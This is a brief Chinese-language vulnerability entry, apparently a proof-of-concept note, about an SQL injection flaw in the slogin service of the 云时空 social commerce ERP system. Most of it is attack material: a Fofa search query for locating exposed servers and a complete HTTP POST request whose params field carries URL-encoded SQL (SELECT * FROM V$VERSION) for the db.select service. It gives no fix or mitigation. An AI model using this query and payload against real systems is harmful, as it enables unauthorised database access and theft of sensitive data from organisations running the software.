漏洞描述：

云时空社会化商业ERP系统slogin存在SQL注入漏洞，攻击者可以通过此漏洞获取数据库敏感信息。

搜索语法:

Fofa-Query: app="云时空社会化商业ERP系统"

漏洞详情：

1.云时空社会化商业ERP系统。

2.漏洞POC：

POST /slogin/service?service=db.select HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 

params=%7B%22sql%22%3A%22SELECT+%2A+FROM+V%24VERSION%22%7D

3.漏洞复现结果。